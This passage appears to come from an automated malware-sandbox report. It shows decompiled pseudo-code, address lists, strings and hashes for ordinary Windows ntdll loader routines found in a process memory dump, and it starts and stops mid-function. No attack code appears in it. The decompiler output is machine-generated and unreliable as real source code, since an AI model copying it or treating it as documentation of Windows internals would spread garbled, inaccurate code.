																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E05269A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x05238799
0x0523879d
0x052387a1
0x052387a3
0x052387a8
0x052387c3
0x052387c3
0x052387c8
0x052387d1
0x052387d4
0x052387d8
0x052387e5
0x052387ec
0x05289bfe
0x05289c00
0x05289c02
0x05289c08
0x05289c0d
0x05289c0f
0x05289c14
0x05289c2d
0x05289c32
0x05289c37
0x05289c3a
0x05289c3c
0x05289c42
0x05289c42
0x05289c3c
0x05289c02
0x052387da
0x052387df
0x052387e3
0x00000000
0x00000000
0x052387e3
0x052387f2
0x00000000
0x052387fb
0x052387fd
0x052387fe
0x0523880e
0x0523880f
0x05238810
0x05238814
0x0523881a
0x0523881c
0x0523881f
0x05238821
0x05238822
0x05238824
0x05238826
0x0523882c
0x0523882e
0x05289c48
0x05289c48
0x05238834
0x05238834
0x05238837
0x00000000
0x00000000
0x05238837
0x0523882e
0x0523883d
0x05238840
0x05238843
0x05238846
0x05238849
0x0523884c
0x0523884e
0x05238850
0x05238852
0x05238854
0x05238857
0x052388b4
0x052388b6
0x052388b6
0x05238859
0x05238859
0x05238859
0x05238861
0x05238866
0x0523886a
0x0523893d
0x05238941
0x00000000
0x05238947
0x05238947
0x0523894a
0x0523894c
0x00000000
0x05238952
0x05238955
0x0523895a
0x0523895d
0x0523895d
0x0523895f
0x05238961
0x05238961
0x05238968
0x00000000
0x00000000
0x0523896a
0x0523896b
0x0523896e
0x00000000
0x05238970
0x05238970
0x05238970
0x05238970
0x05238972
0x05238972
0x05238974
0x00000000
0x0523897a
0x0523897a
0x0523897d
0x00000000
0x05238983
0x05289c65
0x05289c6d
0x05289c72
0x05289c75
0x05289c75
0x05289c82
0x05289c86
0x05289c87
0x05289c88
0x05289c89
0x05289c8c
0x05289c90
0x05289c95
0x05289c97
0x05289ca0
0x05289ca3
0x05289ca9
0x05289ca9
0x00000000
0x05289ca9
0x05289ca3
0x00000000
0x05289c97
0x0523897d
0x00000000
0x05238974
0x05238988
0x05238992
0x05238996
0x00000000
0x05238996
0x0523894c
0x00000000
0x05238870
0x0523887b
0x0523887d
0x0523887f
0x05238881
0x05238884
0x05238884
0x05238886
0x05238889
0x0523888c
0x0523888e
0x05238891
0x05238891
0x05238898
0x00000000
0x00000000
0x0523889a
0x0523889b
0x0523889e
0x00000000
0x00000000
0x052388a0
0x052388a8
0x052388b0
0x052388b2
0x052388d3
0x052388d5
0x00000000
0x052388d7
0x052388db
0x052388dc
0x052388e0
0x052388e8
0x052388ee
0x052388f0
0x052388f3
0x052388fc
0x05238901
0x05238906
0x0523890c
0x0523890c
0x0523890f
0x05238916
0x05238917
0x05238918
0x05238919
0x0523891a
0x0523891f
0x05238921
0x05289c52
0x05289c55
0x05289c5b
0x05289cac
0x05289cc0
0x05289cc0
0x05289c55
0x05238927
0x05238927
0x0523892f
0x05238933
0x00000000
0x052388f5
0x052388f5
0x00000000
0x052388f7
0x052388f7
0x052388fa
0x00000000
0x00000000
0x00000000
0x00000000
0x052388fa
0x052388f5
0x052388f3
0x00000000
0x052388d5
0x00000000
0x052388b2
0x052388c9
0x00000000
0x052388c9
0x0523887f
0x0523886a
0x05238857
0x05238852
0x052388bf
0x052388bf
0x052387aa
0x052387ad
0x052387ae
0x052387b4
0x052387b5
0x052387b6
0x052387b8
0x052387bd
0x052387c1
0x052387f4
0x052387fa
0x00000000
0x00000000
0x00000000
0x052387c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 05289C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 05289C18
minkernel\ntdll\ldrsnap.c, xrefs: 05289C28

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 7f557936882281a22b85b457c61b9f48b2c8886a76fc0b340bf19b2f1fe5a47d
Instruction ID: 1acfc903fddbb13a4b4e1c9c0638ae69d51fe3225e8922987a39937b1b4fa29e
Opcode Fuzzy Hash: 7f557936882281a22b85b457c61b9f48b2c8886a76fc0b340bf19b2f1fe5a47d
Instruction Fuzzy Hash: 6691E4B1A3620A9BDF19DF55C8C2A7AB7B6FF44310F144069F909AF240EB70E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05237E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E05237E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0523CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0522C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x5315780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E052A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x5315780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E05247D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E05247D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E052A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E05247D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E05247D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E052A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0525A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0522B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x05237e4c
0x05237e50
0x05237e55
0x05237e58
0x05237e5d
0x05237e71
0x05237f33
0x05237e77
0x05237e77
0x05237e79
0x05237e79
0x05237e7e
0x05237f45
0x05289848
0x00000000
0x05289848
0x05237f4e
0x05237f53
0x05237f5a
0x00000000
0x00000000
0x0528985a
0x05289862
0x05289866
0x00000000
0x0528986c
0x00000000
0x0528986c
0x05237e84
0x05237e84
0x05237e8d
0x05289871
0x05237eb8
0x05237ec0
0x05237ec0
0x05237e9a
0x0528987e
0x00000000
0x00000000
0x05289884
0x0528988b
0x052898a7
0x052898ac
0x052898b1
0x052898b6
0x052898b8
0x052898b8
0x052898b9
0x00000000
0x052898b9
0x05237ea0
0x05237ea7
0x00000000
0x00000000
0x05237eac
0x05237eb1
0x05237ec6
0x05237ed0
0x052898cc
0x05237ed6
0x05237ed6
0x05237ed6
0x05237ede
0x05237ee3
0x052898e3
0x052898f0
0x05289902
0x052898f2
0x052898fb
0x052898fb
0x05289907
0x0528991d
0x0528991d
0x05289907
0x052898e3
0x05237ef0
0x05237f14
0x05237f14
0x05237f1e
0x05289946
0x05237f24
0x05237f24
0x05237f24
0x05237f2c
0x0528996a
0x05289975
0x05289975
0x0528997e
0x05289993
0x05289993
0x0528997e
0x00000000
0x05237ef2
0x05237efc
0x05237f0a
0x05237f0e
0x05289933
0x00000000
0x05289933
0x00000000
0x05237f0e
0x00000000
0x00000000
0x00000000
0x05237eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 05289891
minkernel\ntdll\ldrmap.c, xrefs: 052898A2
LdrpCompleteMapModule, xrefs: 05289898

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 22bc5c8d67d573aef702469643cc4c009c4500b57e0540408f79f32bbf033284
Instruction ID: 0bfbd03657fddb866d66f0431d61c5db3f385cd6a0d7e33529622c70680d0507
Opcode Fuzzy Hash: 22bc5c8d67d573aef702469643cc4c009c4500b57e0540408f79f32bbf033284
Instruction Fuzzy Hash: 845112B16397429BDB29DBA8C885B3A7BE5FF00710F080599E8669B7D1C770EE44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0522E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0522E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0522F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E052695D0();
						}
						if(_t78 != 0) {
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0526FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0526BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E05269600();
					if(_t97 < 0) {
						goto L6;
					}
					E0526BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0522F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0526BB40(_t83, _t102 + 0x24, _t78);
								if(L052343C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0526BB40(_t84, _t102 + 0x24, _t94);
									if(L052343C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0522e620
0x0522e628
0x0522e62f
0x0522e631
0x0522e635
0x0522e637
0x0522e63e
0x05285503
0x05285503
0x0522e64c
0x0522e64c
0x0522e651
0x00000000
0x00000000
0x0522e661
0x0522e665
0x0528542a
0x0522e715
0x0522e71a
0x0522e71c
0x0522e720
0x0522e720
0x0522e727
0x0522e736
0x0522e736
0x0522e743
0x0522e743
0x0522e673
0x0522e678
0x0522e67d
0x0522e682
0x0522e685
0x0522e692
0x0522e69b
0x0522e6a3
0x0522e6ad
0x0522e6b1
0x0522e6b2
0x0522e6bb
0x0522e6bf
0x0522e6c0
0x0522e6c8
0x0522e6cc
0x0522e6d5
0x0522e6d9
0x00000000
0x00000000
0x0522e6e5
0x0522e6ea
0x0522e6f9
0x0522e70b
0x0522e70f
0x05285439
0x0528545e
0x0528545e
0x00000000
0x0528545e
0x0528543b
0x0528543e
0x05285440
0x05285445
0x05285472
0x05285475
0x0528548d
0x05285493
0x052854a9
0x00000000
0x00000000
0x052854ab
0x052854b4
0x052854bc
0x052854c8
0x052854de
0x052854fb
0x052854e0
0x052854e6
0x052854eb
0x052854eb
0x052854de
0x00000000
0x052854bc
0x05285477
0x0528547a
0x05285480
0x05285483
0x05285486
0x0528548b
0x00000000
0x00000000
0x00000000
0x0528548b
0x00000000
0x00000000
0x00000000
0x00000000
0x05285447
0x05285447
0x05285447
0x05285447
0x0528544e
0x00000000
0x00000000
0x05285450
0x05285452
0x05285455
0x0528545a
0x00000000
0x00000000
0x00000000
0x0528545c
0x0528546a
0x0528546d
0x0528546f
0x00000000
0x0528546f
0x0522e70f

Strings

InstallLanguageFallback, xrefs: 0522E6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0522E68C
@, xrefs: 0522E6C0

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: ffabef54475ac8fc9b3e0d0cb121529583bd500ca435ebf917cdd7ee5c3a72da
Instruction ID: f694b608397af9851ffa9783c5513b0c0cb441311350d3588a169ff5eee1e46b
Opcode Fuzzy Hash: ffabef54475ac8fc9b3e0d0cb121529583bd500ca435ebf917cdd7ee5c3a72da
Instruction Fuzzy Hash: DA510276629356ABC710EF64C444A7BB3E8BF88614F05092EF989D7290F734D944C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 052A51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E052A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x53005f0);
				E0527D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0523EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E052A53CA(0);
						return E0527D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0526F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E05243690(1, _t117, 0x5201810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0526AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L05244620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0526AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E052A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E05269860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x052a51be
0x052a51c3
0x052a51c8
0x052a51cd
0x052a51d0
0x052a51d3
0x052a51d8
0x052a51db
0x052a51de
0x052a51e0
0x052a51e3
0x052a51e6
0x052a51e8
0x052a5342
0x052a5351
0x052a5356
0x052a535a
0x052a5360
0x052a5363
0x052a5366
0x052a5369
0x052a5369
0x052a536b
0x052a536b
0x052a5370
0x052a53a3
0x052a53a4
0x052a53a6
0x052a53ab
0x052a53ab
0x052a53ae
0x052a53ae
0x052a53b5
0x052a53bf
0x052a53bf
0x052a5375
0x052a5396
0x052a53a0
0x052a53a0
0x00000000
0x052a5396
0x052a5377
0x052a5379
0x052a537f
0x052a538c
0x052a5390
0x00000000
0x052a5390
0x052a51ee
0x052a51f1
0x052a5301
0x052a5310
0x052a5315
0x052a5318
0x052a531b
0x052a5320
0x052a532e
0x052a5331
0x00000000
0x052a5331
0x052a5328
0x052a5329
0x00000000
0x052a5329
0x052a51fa
0x052a5235
0x052a5236
0x052a5239
0x052a523f
0x052a5240
0x052a5241
0x052a5242
0x052a5246
0x052a5247
0x052a524e
0x052a5251
0x052a5267
0x052a5269
0x052a526e
0x052a527d
0x052a527e
0x052a5281
0x052a5282
0x052a5287
0x052a5288
0x052a528a
0x052a528f
0x052a5294
0x00000000
0x00000000
0x052a529a
0x052a529c
0x052a529e
0x052a529e
0x052a52a4
0x052a52b0
0x00000000
0x00000000
0x052a52ba
0x052a52bc
0x052a52bc
0x052a52d4
0x052a52d9
0x052a52dc
0x052a52e1
0x00000000
0x00000000
0x052a52e7
0x052a52f4
0x00000000
0x052a52f4
0x052a5270
0x00000000
0x052a5270
0x052a51fc
0x052a51fd
0x052a5202
0x052a5203
0x052a5205
0x052a520a
0x052a520f
0x00000000
0x00000000
0x052a521b
0x052a5226
0x052a522b
0x052a521d
0x052a521d
0x052a5222
0x052a5222
0x052a522d
0x00000000

Strings

Legacy, xrefs: 052A5226
UEFI, xrefs: 052A521D

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: a08bdccb8d22aca7af0adcf35e1c84315dad94faa288b735ae24a8978825e382
Instruction ID: 64ad7c2421994e13b6de07e00e5e22e14ed0f478d2632f325e599c599e6ee7ec
Opcode Fuzzy Hash: a08bdccb8d22aca7af0adcf35e1c84315dad94faa288b735ae24a8978825e382
Instruction Fuzzy Hash: 57517DB2B246099FDF29DFA8D840BAEBBF9FF88700F14402DE509EB251D6719940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0522B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0522B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x52ff7a8);
				E0527D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0527D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0526D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0526F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0527DEF0(_t99, _t106);
